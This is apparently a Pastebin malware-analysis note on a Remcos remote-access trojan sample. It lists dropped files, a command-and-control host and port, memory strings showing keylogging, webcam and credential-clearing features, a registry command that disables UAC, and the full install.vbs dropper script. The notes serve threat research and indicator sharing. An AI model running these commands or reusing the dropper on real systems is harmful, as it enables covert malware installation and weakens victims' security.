API tools faq
paste
Advertisement
Neonprimetime

2018-04-02 @SevenLayerJedi #remcos rat

Neonprimetime
Apr 2nd, 2018
823
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.60 KB | None | 0 0
raw download clone embed print report
  1. found by Keith Smith @SevenLayerJedi #remcos rat https://twitter.com/SevenLayerJedi/status/980809311042629634
  2. https://pastebin.com/raw/x7DJ9Drj
  3. https://www.hybrid-analysis.com/sample/6050fea1bb63a53a31b0e1ed957427a1d916115c83dffaf2b2d5c25bcc51b146/5ac22fed7ca3e10787046705
  4.  
  5. exe ran and created a new chrome.exe process where it does it's bidding from
  6.  
  7. --------------
  8. files seen
  9. --------------
  10. C:\Users\xxx\AppData\Roaming\remcos\remcos.exe
  11. C:\Users\xxx\AppData\Local\temp\install.vbs
  12. chrome.exe
  13.  
  14. --------------
  15. network connections
  16. --------------
  17. georgeoffor.ddns.net 213.183.58.61
  18. 0x812cd1 (42): georgeoffor.ddns.net:1990:pass|@@Host@@5@@
  19.  
  20. --------------
  21. interesting in memory strings
  22. --------------
  23. 0x301994 (166): "C:\Windows\System32\WScript.exe" "C:\Users\Win732\AppData\Local\Temp\install.vbs"
  24. 0x413658 (11): CloseCamera
  25. 0x413664 (10): OpenCamera
  26. 0x41385c (23): Uploading file to C&C:
  27. 0x413884 (25): Offline Keylogger Started
  28. 0x4138b0 (27): { User has been idle for
  29. 0x4138cc (12): minutes }
  30. 0x4138dc (24): Online Keylogger Started
  31. 0x4138f8 (24): Online Keylogger Stopped
  32. 0x413914 (25): Offline Keylogger Stopped
  33. 0x413c00 (38): [Chrome StoredLogins found, cleared!]
  34. 0x413d0c (32): [Firefox StoredLogins cleared!]
  35. 0x414210 (24): \install.vbs
  36. 0x4142f0 (28): \uninstall.vbs
  37. 0x414398 (22): \update.vbs
  38. 0x41444c (24): \restart.vbs
  39. 0x4146c4 (27): C:\Windows\System32\cmd.exe
  40. 0x4146e0 (129): /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
  41. 0x4148b4 (17): Connected to C&C!
  42. 0x4148c8 (34): Initializing connection to C&C...
  43. 0x414d74 (27): * Breaking-Security.Net
  44. 0x414d90 (11): * REMCOS v
  45. 0x812cd1 (42): georgeoffor.ddns.net:1990:pass|@@Host@@5@@
  46. 0x817039 (11): Screenshots
  47. 0x817579 (23): Software\Remcos-SCLZ2Y\
  48. 0x817aa2 (94): C:\Users\xxx\AppData\Roaming\remcos\logs.dat
  49.  
  50. --------------
  51. interesting api calls seen
  52. --------------
  53. chrome.exe CreateDirectoryW ( "C:\Users\xxx\AppData\Roaming\remcos", NULL ) FALSE
  54. chrome.exe CreateFileW ( "C:\Users\xxx\AppData\Roaming\remcos\logs.dat", GENERIC_READ, FILE_SHARE_DELETE | FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL )
  55. chrome.exe gethostbyname ( "georgeoffor.ddns.net" ) 0x00386da8 0.0003958
  56.  
  57.  
  58. --------------
  59. interesting file found install.vbs
  60. --------------
  61. WScript.Sleep 1000
  62. Set fso = CreateObject("Scripting.FileSystemObject")
  63. fso.DeleteFile "C:\Users\xxx\Desktop\bad.exe"
  64. CreateObject("WScript.Shell").Run "cmd /c ""C:\Users\xxx\AppData\Roaming\remcos\remcos.exe""", 0
  65. fso.DeleteFile(Wscript.ScriptFullName)
  66. --------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!